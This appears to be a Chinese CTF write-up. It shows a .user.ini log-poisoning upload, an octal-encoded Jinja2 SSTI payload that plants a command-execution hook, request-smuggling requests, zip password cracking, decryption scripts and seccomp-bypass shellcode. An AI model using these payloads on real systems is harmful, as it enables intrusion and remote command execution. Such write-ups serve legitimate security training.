_0x46fbc7: 0x40c,
_0x58105b: 0x428
}
, _0x18d994 = {
_0xa1a695: 0x41
}
// Helper table: small call-through functions plus string constants used below.
, _0x274b97 = {
'pMerZ': function(_0x11187d, _0x1e4667) {
return _0x11187d + _0x1e4667;
},
'zBcBS': function(_0xfc867a) {
return _0xfc867a();
},
'HkLqK': _0xfcd4c3(0x16f, _0x86515e._0x286f56, 0x183, _0x86515e._0x19da52),
'BDHPv': 'info',
'hnIHA': _0xfcd4c3(0x1d1, _0x86515e._0x2b457d, _0x86515e._0x128216, _0x86515e._0x4ffbab),
'aRbes': _0xfcd4c3(_0x86515e._0x28ed0e, _0x86515e._0x291b9a, 0x193, _0x86515e._0x4bb0db),
'ORqsS': _0x2b8afa(_0x86515e._0x7c06bb, 0x462, _0x86515e._0x27e896, 0x469),
'lLsFb': function(_0x34a9a3, _0x4110b5) {
return _0x34a9a3 < _0x4110b5;
},
// Execution order of the flattened switch further down.
'sGuYZ': '5|2|1|0|3|' + '4'
}
, _0x23eea3 = function() {
var _0x28ca73 = {
_0x5c6bb7: 0x17a,
_0x4e7ce5: 0x298,
_0x802c84: 0x7d
};
function _0x5515cc(_0x2e8499, _0x270277, _0xa14d2e, _0x435b89) {
return _0xfcd4c3(_0x270277, _0x270277 - 0x160, _0x435b89 - 0x285, _0x435b89 - _0x18d994._0xa1a695);
}
var _0x171219;
function _0x51b2df(_0xedb1f2, _0x188f0f, _0x5ba311, _0x81a1a1) {
return _0xfcd4c3(_0x81a1a1, _0x188f0f - _0x28ca73._0x5c6bb7, _0x188f0f - _0x28ca73._0x4e7ce5, _0x81a1a1 - _0x28ca73._0x802c84);
}
// Resolve the global object by compiling a string with the Function constructor; if that
// throws (for example where dynamic code evaluation is blocked), fall back to `window`.
try {
_0x171219 = Function(_0x274b97[_0x51b2df(_0x218a07._0x334681, _0x218a07._0x3e0531, _0x218a07._0x265858, _0x218a07._0x328b53)](_0x5515cc(_0x218a07._0x25e2fd, _0x218a07._0x12cc97, _0x218a07._0x4c19ff, 0x407) + _0x51b2df(0x411, _0x218a07._0x2f93b9, _0x218a07._0x122edb, _0x218a07._0x46fbc7), '{}.constru' + _0x5515cc(_0x218a07._0x58105b, 0x421, 0x448, 0x431) + 'rn\x20this\x22)(' + '\x20)') + ');')();
} catch (_0x421704) {
_0x171219 = window;
}
return _0x171219;
}
, _0x1b449f = _0x274b97[_0xfcd4c3(_0x86515e._0x45dc0, _0x86515e._0x1489c9, 0x1b3, _0x86515e._0x347965)](_0x23eea3)
// Use the existing console object, or install an empty object in its place.
, _0xf883ee = _0x1b449f[_0x2b8afa(_0x86515e._0x59f0ab, 0x44d, _0x86515e._0x2c1a61, _0x86515e._0x9df6de)] = _0x1b449f['console'] || {}
// Seven method names; 'warn' and 'info' (via 'BDHPv') are literal, the rest are decoded.
, _0x53109c = [_0x274b97[_0xfcd4c3(_0x86515e._0x4f3b7c, _0x86515e._0x445b79, _0x86515e._0x291b9a, _0x86515e._0x35dac4)], 'warn', _0x274b97[_0x2b8afa(_0x86515e._0x2e155b, _0x86515e._0x4163a0, _0x86515e._0x35590a, 0x448)], _0x274b97['hnIHA'], _0x274b97[_0x2b8afa(_0x86515e._0x5a92d9, _0x86515e._0x5713dd, _0x86515e._0x9ce866, _0x86515e._0x5d2011)], _0x274b97['ORqsS'], _0x2b8afa(_0x86515e._0x2fb363, _0x86515e._0x49d807, 0x447, 0x45c)];
function _0x2b8afa(_0x410775, _0x271235, _0xaede52, _0x7ad671) {
return _0x2fa2(_0x7ad671 - _0x3d04ad._0x4cc0de, _0xaede52);
}
function _0xfcd4c3(_0x270100, _0x1435df, _0x586469, _0x24f88a) {
return _0x2fa2(_0x586469 - _0x1e0392._0x2a0a5c, _0x270100);
}
// One pass per method name; the statements inside run in the order given by 'sGuYZ'.
for (var _0x52328e = -0x1c37 + -0x2db + 0x1f12; _0x274b97[_0xfcd4c3(_0x86515e._0x45dc0, _0x86515e._0x4773f9, _0x86515e._0x2f7d38, _0x86515e._0x32352a)](_0x52328e, _0x53109c[_0xfcd4c3(0x1c2, _0x86515e._0xa28e16, _0x86515e._0x393026, _0x86515e._0x4bed42)]); _0x52328e++) {
var _0x161f25 = _0x274b97[_0x2b8afa(0x46b, _0x86515e._0x3138ee, _0x86515e._0x1efc32, _0x86515e._0x1e00d8)]['split']('|')
, _0x5ed1e0 = 0x162d + -0x1d * 0xda + 0x3 * 0xd7;
while (!![]) {
switch (_0x161f25[_0x5ed1e0++]) {
case '0':
_0x2e72f3[_0x2b8afa(_0x86515e._0x14f997, _0x86515e._0x5d2011, _0x86515e._0x1fabb8, _0x86515e._0x18ef54)] = _0x335615[_0x2b8afa(0x455, _0x86515e._0x3642df, _0x86515e._0x5e5450, _0x86515e._0x15d374)](_0x335615);
continue;
case '1':
// Keep the original method (or the replacement itself when the console lacks it).
var _0x5b572d = _0xf883ee[_0x2327c2] || _0x2e72f3;
continue;
case '2':
var _0x2327c2 = _0x53109c[_0x52328e];
continue;
case '3':
// The replacement's toString is taken from the original method and bound to it.
_0x2e72f3['toString'] = _0x5b572d[_0x2b8afa(_0x86515e._0xbb9bff, _0x86515e._0x540c80, _0x86515e._0x28a91f, _0x86515e._0x174890)][_0xfcd4c3(_0x86515e._0x17342b, _0x86515e._0x13795f, 0x190, _0x86515e._0x3c7980)](_0x5b572d);
continue;
case '4':
// Install the replacement under the method name.
_0xf883ee[_0x2327c2] = _0x2e72f3;
continue;
case '5':
var _0x2e72f3 = _0x335615[_0x2b8afa(_0x86515e._0x397a84, _0x86515e._0x28a91f, 0x43c, _0x86515e._0x1dacac) + 'r'][_0xfcd4c3(0x1ad, _0x86515e._0x128216, 0x194, _0x86515e._0x500c6c)][_0xfcd4c3(0x18f, _0x86515e._0x2d2155, _0x86515e._0x26599c, 0x19f)](_0x335615);
continue;
}
break;
}
}
});
// Runs the console stub, then assigns a function to a property of `window` whose name is
// looked up through the string table (the table contains 'alert' — TODO confirm the target).
// The assigned function shows three confirm() dialogs. The second message starts with the
// literal 'rqxvweqty,'; the remaining pieces are string-table entries. The write-up joins the
// dialog texts into the path /rqxvweqtyfshbs.php, so the "hidden" path is recoverable from
// the client-side script alone.
_0xfb81ef(),
window[_0x43b95d(0x195, 0x186, 0x177, 0x185)] = function() {
var _0x11e4ba = {
_0x54ce81: 0x81,
_0x3f05fd: 0x8b,
_0x3c12d8: 0x66,
_0x4f7709: 0x24b,
_0x4097be: 0x261,
_0x26b0f8: 0x24e,
_0x34a3a3: 0xb7,
_0x67fb88: 0x9c,
_0x4337fa: 0xbb,
_0x2d8f19: 0xbe,
_0x16ffa7: 0x25c,
_0x29c7a0: 0x239,
_0x4fd058: 0x245,
_0x1eed2e: 0x251,
_0x3d8cce: 0x25c,
_0x135008: 0x27e,
_0x1548b1: 0x264,
_0x1aa760: 0x23c,
_0x229bf7: 0x244,
_0xe6db95: 0x239,
_0x3aa31e: 0x23b,
_0x3c19c3: 0x93,
_0x52b346: 0xba,
_0x48ed1f: 0x268,
_0x5d4762: 0x26c,
_0x3c9e76: 0x254,
_0x2a9f09: 0x276
}
, _0x28ad78 = {
_0x5cc3bd: 0xd7,
_0x17ef46: 0x1a2,
_0x53dab6: 0x129
}
, _0x36a7b3 = {
_0x2f2c5a: 0xe9,
_0x101124: 0x10b
}
// 'BmCfZ' is a call-through helper (f, x) -> f(x); 'rjCiw' is the second dialog text.
, _0x8bd32d = {
'BmCfZ': function(_0x571dda, _0x15b43b) {
return _0x571dda(_0x15b43b);
},
'rjCiw': 'rqxvweqty,' + _0x2f5b69(_0x11e4ba._0x54ce81, 0x86, _0x11e4ba._0x3f05fd, _0x11e4ba._0x3c12d8) + 'of\x20it'
}
// First dialog text: two decoded pieces followed by the literal 'e'.
, _0x12c806 = _0xf4e5c(_0x11e4ba._0x4f7709, _0x11e4ba._0x4097be, 0x258, 0x25a) + _0xf4e5c(0x261, 0x252, 0x282, _0x11e4ba._0x26b0f8) + 'e';
function _0xf4e5c(_0x5cdb5f, _0x1bf623, _0x4be90e, _0x2b1dd6) {
return _0x43b95d(_0x5cdb5f - _0x36a7b3._0x2f2c5a, _0x1bf623, _0x4be90e - _0x36a7b3._0x101124, _0x2b1dd6 - _0x36a7b3._0x2f2c5a);
}
_0x8bd32d[_0x2f5b69(_0x11e4ba._0x34a3a3, _0x11e4ba._0x67fb88, _0x11e4ba._0x4337fa, _0x11e4ba._0x2d8f19)](confirm, _0x12c806);
function _0x2f5b69(_0xfde3ce, _0x57f13f, _0x4cdb67, _0x13e691) {
return _0x43b95d(_0x57f13f - -_0x28ad78._0x5cc3bd, _0x13e691, _0x4cdb67 - _0x28ad78._0x17ef46, _0x13e691 - _0x28ad78._0x53dab6);
}
_0x8bd32d[_0xf4e5c(_0x11e4ba._0x16ffa7, _0x11e4ba._0x29c7a0, _0x11e4ba._0x4fd058, _0x11e4ba._0x1eed2e)](confirm, _0x8bd32d['rjCiw']),
// Third dialog text: three decoded pieces.
_0x8bd32d[_0xf4e5c(_0x11e4ba._0x3d8cce, _0x11e4ba._0x135008, _0x11e4ba._0x1548b1, _0x11e4ba._0x1aa760)](confirm, _0xf4e5c(_0x11e4ba._0x229bf7, 0x23d, _0x11e4ba._0xe6db95, _0x11e4ba._0x3aa31e) + _0x2f5b69(0xcd, 0xb3, _0x11e4ba._0x3c19c3, _0x11e4ba._0x52b346) + _0xf4e5c(_0x11e4ba._0x48ed1f, _0x11e4ba._0x5d4762, _0x11e4ba._0x3c9e76, _0x11e4ba._0x2a9f09));
}
;

https://obf-io.deobfuscate.io/


访问/rqxvweqtyfshbs.php

奶龙牌图片处理器2.0

nginx环境下直接上传.user.ini:用auto_append_file把nginx访问日志附加到PHP脚本末尾执行,而User-Agent里的PHP代码会被记录进这份日志

POST / HTTP/1.1
Host: 175.27.251.122:33165
Upgrade-Insecure-Requests: 1
Origin: http://175.27.251.122:33165
Referer: http://175.27.251.122:33165/
Cookie: JSESSIONID=node0jmgnupaoej9r7mqglbiahyzu4.node0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjdcuXv5OADAN7I
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36;<?php phpinfo();?>
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 366

------WebKitFormBoundaryoIjdcuXv5OADAN7I
Content-Disposition: form-data; name="upload_file"; filename=".user.ini"
Content-Type: application/octet-stream

auto_append_file=/var/log/nginx/access.log
------WebKitFormBoundaryoIjdcuXv5OADAN7I--


重新开个靶机上传木马即可

Try2Crossover

from flask import Flask, render_template, request, redirect, url_for, render_template_string, abort

app = Flask(__name__)


books = [
{"id": 1, "title": "the great gatsby", "author": "F. Scott Fitzgerald"},
{"id": 2, "title": "to kill a lockingbird", "author": "Harper Lee"},
{"id": 3, "title": "1984", "author": "George Orwell"}
]


def waf(code):
    # Substring denylist for form input: any hit aborts the request with HTTP 403.
    # NOTE(review): the match is case-sensitive and looks only at the literal text, so it
    # cannot recognise an encoded spelling of a blocked word (the write-up's payload uses
    # octal string escapes). The underlying problem is that user input is later rendered
    # as template source; filtering words does not remove that.
    # NOTE(review): request.form.get() yields None for a missing field, and `pattern in None`
    # raises TypeError instead of reaching abort(403).
    blacklist = ["waf", "before", "after", "error", "teardown", "context", "appcontext",
                 ">", "<", "|", "stack", "top", "join", "count", "\\x", "original","request"]
    if any(pattern in code for pattern in blacklist):
        abort(403)

# Snapshot of waf's code object and name, taken when the module is loaded; details()
# compares the live values against these and answers 403 if either one differs.
original_code = waf.__code__
original_name = waf.__name__

@app.route('/')
def index():
    # List page: passes the in-memory `books` list to the index.html template file.
    return render_template('index.html', books=books)


@app.route('/add_book', methods=['POST'])
def add_book():
    # Create a book from the POSTed form fields, then redirect to the list page.
    title = request.form.get('title')
    author = request.form.get('author')
    # Both fields go through the denylist before anything is stored.
    waf(title)
    waf(author)

    # The id is derived from the current list length.
    book_id = len(books) + 1
    books.append({"id": book_id, "title": title, "author": author})

    return redirect(url_for('index'))


@app.route('/edit_book/<int:book_id>', methods=['GET', 'POST'])
def edit_book(book_id):
    # Show the edit form (GET) or overwrite title/author of an existing book (POST).
    # NOTE(review): `book` is None when no entry has this id; the POST branch would then
    # fail on item assignment.
    book = next((b for b in books if b["id"] == book_id), None)

    if request.method == 'POST':
        # NOTE(review): the new values are written into the shared `books` entry before
        # waf() runs, so input that is answered with 403 has already been stored.
        book["title"] = request.form.get('title')
        book["author"] = request.form.get('author')
        waf(book['title'])
        waf(book['author'])

        return redirect(url_for('index'))

    return render_template('edit_book.html', book=book)


@app.route('/details/<int:id>', methods=['GET', 'POST'])
def details(id):
    # Detail page for one book; re-checks the stored author against the denylist first.
    book = next((b for b in books if b["id"] == id), None)
    book_author = book.get("author")
    waf(book_author)

    tem = """
<head>
<title>Book Details</title>
</head>
<body>
<h1>Book Details</h1>
<p>ID: {{ book.id }}</p>
<p>Title: {{ book.title|capitalize_title }}</p>
<p>No other info.</p>
</body>
</html>"""
    # NOTE(review): the stored author string is passed as *template source*, so any Jinja2
    # expression in it is evaluated on the server (server-side template injection). The
    # rendered output is discarded, so nothing is echoed back. This is the sink the
    # write-up's payload reaches. Untrusted text belongs in the template context only,
    # never in the template string.
    render_template_string(book_author)
    # Integrity check: refuse to answer if waf's code object or name no longer match the
    # snapshot taken at load time.
    if waf.__code__ != original_code or waf.__name__ != original_name:
        abort(403)
    # `book_author` is supplied as a context variable here, but `tem` never references it.
    return render_template_string(tem, book_author=book_author, book=book, )


@app.route('/forbidden',methods=['GET', 'POST'])
def forbidden():
    # Static response; nothing in this listing redirects here.
    return "forbidden!!!"


@app.template_filter('capitalize_title')
def capitalize_title(title):
    # Jinja2 filter used by the details template: splits on whitespace, applies
    # str.capitalize() to every word and joins the words with single spaces.
    return ' '.join(word.capitalize() for word in title.split())


@app.route("/admin", methods=['GET', 'POST'])
def admin():
    # Echoes the `username` form field; there is no authentication in this handler.
    username = request.form.get('username')

    # NOTE(review): the value is interpolated into the response body without escaping, and
    # Flask serves a returned str as HTML by default, so submitted markup would be reflected.
    return f"Username: {username}\n"

if __name__ == '__main__':
    # Starts Flask's built-in server listening on every interface, port 5000.
    # NOTE(review): per the hint quoted in the write-up, the deployed instance sits behind
    # a reverse proxy.
    app.run(host="0.0.0.0", port=5000)


本来不想动脑的,稍微看了一下好像八进制可以绕过,我之前蜀道山出的那道题目预期也是如此,现在只需要将payload优化即可

{{url_for["\137\137\147\154\157\142\141\154\163\137\137"]["\137\137\142\165\151\154\164\151\156\163\137\137"]["\145\166\141\154"]("\141\160\160.\141\146\164\145\162\137\162\145\161\165\145\163\164\137\146\165\156\143\163.\163\145\164\144\145\146\141\165\154\164(None, []).\141\160\160\145\156\144(lambda \162\145\163\160: \103\155\144\122\145\163\160 if \162\145\161\165\145\163\164.\141\162\147\163.\147\145\164('\143\155\144') and \145\170\145\143(\"\147\154\157\142\141\154 \103\155\144\122\145\163\160;\103\155\144\122\145\163\160=\137\137\151\155\160\157\162\164\137\137('\146\154\141\163\153').\155\141\153\145\137\162\145\163\160\157\156\163\145(\137\137\151\155\160\157\162\164\137\137('\157\163').\160\157\160\145\156(\162\145\161\165\145\163\164.\141\162\147\163.\147\145\164('\143\155\144')).\162\145\141\144())\")==None else \162\145\163\160)", {"\162\145\161\165\145\163\164":url_for["\137\137\147\154\157\142\141\154\163\137\137"]["\162\145\161\165\145\163\164"],"\141\160\160":url_for["\137\137\147\154\157\142\141\154\163\137\137"]["current_app"]})}}
from flask import Flask, request, render_template_string, abort

app = Flask(__name__)

# Same word list as the challenge's waf(), kept at module level for the local test harness.
blacklist = [
    "waf", "before", "after", "error", "teardown", "context", "appcontext",
    ">", "<", "|", "stack", "top", "join", "count", "\\x", "original", "request",
]


def waf_check(input_str):
    """Return the denylist entries that occur in *input_str*, in denylist order.

    The comparison ignores case, which makes this harness stricter than the
    challenge's case-sensitive waf(): input accepted here is accepted there too.
    An empty list means nothing matched.
    """
    lowered = input_str.lower()
    return [pattern for pattern in blacklist if pattern.lower() in lowered]


@app.route('/')
def hello_world():
    """Local test endpoint: greet the `name` query parameter after the denylist check.

    Requests whose `name` matches a denylist entry are logged to stdout and
    answered with 403.
    """
    name = request.args.get('name', 'bao')

    matches = waf_check(name)
    if matches:
        print(f"[WAF Blocked] 匹配到黑名单内容: {matches}")
        abort(403)

    # NOTE(review): `name` is formatted into the template source itself, so this endpoint is
    # injectable on purpose; it exists to try inputs against the filter locally and must
    # not be reachable from anywhere else.
    return render_template_string(f'<h1>Hi, {name}.</h1>')


if __name__ == '__main__':
    # NOTE(review): binds the deliberately injectable test app to every interface; for a
    # local experiment 127.0.0.1 would be enough.
    app.run(host='0.0.0.0', port=5000)

本地测试了一下,肯定是绕过了的,但是远程不知道为什么没通,后面看到hint说有中间件作为反代,需要进行请求走私

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

网上给的是这种,那这题就是这样的

POST /admin HTTP/1.1
Host: 175.27.251.122:10001
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Sec-Websocket-Key1: x

usernamePOST /add_book HTTP/1.1
Host: 175.27.251.122:10001
Content-Length: 284
Content-Type: application/x-www-form-urlencoded
Connection: close

title=test&author={{get_flashed_messages["\137\137\147\154\157\142\141\154\163\137\137"]["\137\137\142\165\151\154\164\151\156\163\137\137"]['\137\137\151\155\160\157\162\164\137\137']('os').popen('sleep 5').read()}}


不知道为什么,用yakit做不了。改为把命令输出写到静态目录:

mkdir static;ls />static/3.txt
mkdir static;cat f*>static/3.txt

傻逼环境我测你妈

small_challenge


binwalk -e 1.png,有两个图,先双图合并试试


https://zxing.org/w/decode.jspx 解密,解密结果放到随波逐流里

UV!W_X_YZ,U,Y∈[0,9], V,W,X,Z∈[A,z]

直接掩码爆破

zip2john flag.zip >zip1.txt

john --mask='?d[A-Za-z]![A-Za-z]_[A-Za-z]_?d[A-Za-z]' zip1.txt --format=pkzip --fork=4


就是压缩包密码

数学天才

试炼一和试炼二两个一起看,解压葵花宝典

试炼一:斜下对角线的数字,是打开葵花宝典的密钥。
试炼二:为师不想要死,为师喜欢$。

经过分析得知


得到密码295$25$23,随波得到

synt{E3@1_Z@gu_t3avh5!}

# 有好几个有意义的挨着交
flag{R3@1_M@th_g3niu5!}

001

已知 6 位嫌疑人的手机号分别是:
135****2345
138****7383
153****9888
155****7991
157****0947
170****5678

找出和170****5678通话,微信图片_20250519152440.png和微信图片_20250519152452.png,其中全是该嫌疑人通话,


慢慢找,找出是flag{133****0181}

002


135****2345开头的嫌疑人进行了部分排查,写个脚本进行处理

import pandas as pd
from collections import defaultdict
import sys


def find_common_contacts(target_numbers, call_records_df):
    """Find the numbers that exchanged calls with every given target number.

    Args:
        target_numbers (list): Phone numbers to look up.
        call_records_df (DataFrame): Call records with the columns
            '本机号码' (own number) and '对方号码' (other party).

    Returns:
        set: Numbers that appear as a call partner of each target number found
        in the records, excluding the target numbers themselves. Targets that
        never occur in the records are reported on stdout and left out of the
        intersection.
    """
    # Call partners seen for each target number, regardless of call direction.
    peers_by_target = defaultdict(set)
    for _, record in call_records_df.iterrows():
        own_number, other_number = record['本机号码'], record['对方号码']
        if own_number in target_numbers:
            peers_by_target[own_number].add(other_number)
        if other_number in target_numbers:
            peers_by_target[other_number].add(own_number)

    # Warn about targets that do not occur in the records at all.
    if len(peers_by_target) < len(target_numbers):
        missing_numbers = set(target_numbers) - set(peers_by_target.keys())
        print(f"警告: 以下号码在通话记录中未找到: {', '.join(missing_numbers)}")

    partner_sets = [
        peers_by_target[number]
        for number in target_numbers
        if number in peers_by_target
    ]
    if not partner_sets:
        return set()

    # Intersect the partner sets, then drop the targets themselves from the result.
    return set.intersection(*partner_sets) - set(target_numbers)


def main():
    """Load call records from an Excel sheet and report the shared contacts.

    The workbook path and sheet name are taken from the first two command-line
    arguments when present. The result is printed and also written to a new
    Excel file in the working directory.
    """
    # Numbers under investigation (masked as in the task description).
    target_numbers = [
        '135****2345',
        '138****7383',
        '153****9888',
        '155****7991',
        '157****0947',
        '170****5678'
    ]
    number_columns = ('本机号码', '对方号码')

    try:
        # Allow the workbook and sheet to be overridden on the command line.
        file_name = sys.argv[1] if len(sys.argv) > 1 else '工作簿2.xlsx'
        sheet_name = sys.argv[2] if len(sys.argv) > 2 else 'Sheet1'

        print(f"正在从 {file_name}{sheet_name} 表中读取数据...")
        records = pd.read_excel(file_name, sheet_name=sheet_name)

        # Stop early when an expected column is absent.
        missing_columns = [col for col in number_columns if col not in records.columns]
        if missing_columns:
            print(f"错误:Excel文件中缺少以下列: {', '.join(missing_columns)}")
            return

        print(f"原始数据包含 {len(records)} 条记录")

        # Compare numbers as strings so that they match the target list.
        for col in number_columns:
            records[col] = records[col].astype(str)

        # Repeated calls between the same pair add nothing to the analysis.
        records = records.drop_duplicates(subset=list(number_columns))
        print(f"去重后包含 {len(records)} 条记录")

        common_numbers = find_common_contacts(target_numbers, records)

        print(f"\n与所有给定电话号码都有通话记录的电话号码: {len(common_numbers)} 个")
        if common_numbers:
            print(*sorted(common_numbers), sep='\n')
        else:
            print("没有找到共同联系人")

        # Persist the result next to the script's working directory.
        output_file = '共同联系人结果.xlsx'
        pd.DataFrame({'共同联系人': list(common_numbers)}).to_excel(output_file, index=False)
        print(f"\n结果已保存到 '{output_file}'")

    except FileNotFoundError:
        print(f"错误:找不到文件 '{file_name}'")
    except Exception as e:
        print(f"发生错误: {e!s}")


if __name__ == "__main__":
main()

得到flag{158****6074}

004

138****7383把这个号码的所有都提取出来,有448个,把时间锁定


类似的挨着找出来即可

flag{130****9357-137****5632-139****2928-183****5333}

qrd

flag格式为part1/part2,打开part1,发现是进行了某些加密,丢给gpt分析

image-20250524175423699

梭哈解密脚本,得到第一段flag

# Known encrypted bytes of the first flag part.
encrypted = [88, 47, 80, 54, 95, 57, 90, 54, 94, 47]

# Two-byte XOR key, applied alternately (even positions use 0x31, odd positions 0x58).
keys = [0x31, 0x58]

# XOR each byte with the key byte for its position and collect the characters.
plain_chars = []
for position, value in enumerate(encrypted):
    plain_chars.append(chr(value ^ keys[position % 2]))
decrypted = ''.join(plain_chars)

# Show the result.
print("Decrypted flag:", decrypted)

# Decrypted flag: iwannaknow

第二段看图标可以知道是python打包的exe,常规反编译即可,用在线网站反编译后发现还需要一个decrypt函数

image-20250524175713874

在pyz打包的目录中找到secret.pyc,反编译得到decrypt函数

image-20250524175750635

丢给gpt写脚本即可:

def key_schedule(key: bytes) -> list:
    """Build the 128-entry permutation table for the stream cipher from *key*.

    The structure resembles an RC4-style key schedule with two changes visible
    here: the table has 128 entries, and the running index is XORed with 55
    before each swap.
    """
    box = list(range(128))
    key_len = len(key)
    swap_at = 0
    for pos in range(128):
        mixed = (box[pos] + key[pos % key_len] + swap_at) % 128
        swap_at = (mixed ^ 55) % 128
        box[pos], box[swap_at] = box[swap_at], box[pos]
    return box


def next_byte(state: dict) -> int:
    """Advance the generator state in place and return the next keystream byte.

    *state* holds the table under 'S' and the two indexes under 'i' and 'j'.
    The selected table value is below 128; its two nibbles are swapped to form
    the output byte.
    """
    box = state['S']
    i = state['i'] = (state['i'] + 1) % 128
    j = state['j'] = (state['j'] + box[i]) % 128
    box[i], box[j] = box[j], box[i]
    picked = box[(box[i] + box[j]) % 128]
    return ((picked << 4) | (picked >> 4)) & 0xFF


def decrypt(ciphertext: bytes, key: bytes) -> bytes:
    """XOR *ciphertext* with the keystream derived from *key* and return the result.

    The generator starts from the table produced by key_schedule() with both
    indexes at zero; one keystream byte is consumed per ciphertext byte.
    """
    state = {'S': key_schedule(key), 'i': 0, 'j': 0}
    return bytes(cipher_byte ^ next_byte(state) for cipher_byte in ciphertext)


# key 和 ciphertext 来自 WO0o.py
key = bytes.fromhex(
'EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD')
ciphertext = b'\xd4z\'0L\x10\xca\x0b\x0b\xaa\x15\xbeK0"\xbf\xb2\xc6\x05'

# 解密得到 flag
flag = decrypt(ciphertext, key)
print(flag.decode())

# what_DO_you_mean#@!

拼接即为flag

小馋猫

题目开启沙箱

image-20250524164221697

限制了一堆函数,但是可以使用open和sendfile函数

程序逻辑限制只能有一次syscall

image-20250524164325746

并且清空了常见的寄存器,可以从xmm0寄存器中mov到rdi一个地址

恢复栈,然后调用一次open,之后布置好参数,jmp短跳转到上一次syscall,执行第二次sendfile的系统调用

from pwn import*
# Assemble for x86-64; debug logging prints all traffic.
context(arch='amd64',log_level='debug')
# p=process("./pwn")

# Remote challenge instance used in the write-up.
p=remote("175.27.229.115",7470)
p.recvuntil(":")


# Shellcode as described in the text above: the address kept in xmm0 is moved to rdi and
# reused as the stack pointer, then open (rax=2) is issued on the path constant (the bytes
# of 0x67616c662f2e spell './flag' in little-endian order). After the syscall the registers
# are loaded for sendfile (rax=40): out_fd=1 in rdi, in_fd=the open() result in rsi,
# count=0x100 in r10.
# NOTE(review): rdx (sendfile's offset pointer) is not set here — presumably still zero
# from the program's register clearing; confirm.
shellcode=asm('''
movq rdi, xmm0
mov rsp,rdi
mov rax, 2
mov rdi, 0x67616c662f2e
push rdi
mov rdi, rsp
nop
syscall
mov rsi,rax
mov rax,40
mov rdi,1
mov r10,0x100
''')
# Payload layout: 0x30 filler bytes, the shellcode, then the two bytes eb e3 (a short
# backward jump) which, per the write-up, re-enters the earlier syscall instruction.
# Defender's view: the "one syscall" rule described above limits instructions in the
# buffer, not executions, and the sandbox leaves open and sendfile available, which
# together are enough to read a file out.
p.sendline(b'a'*0x30+shellcode+b'\xeb\xe3')
p.interactive()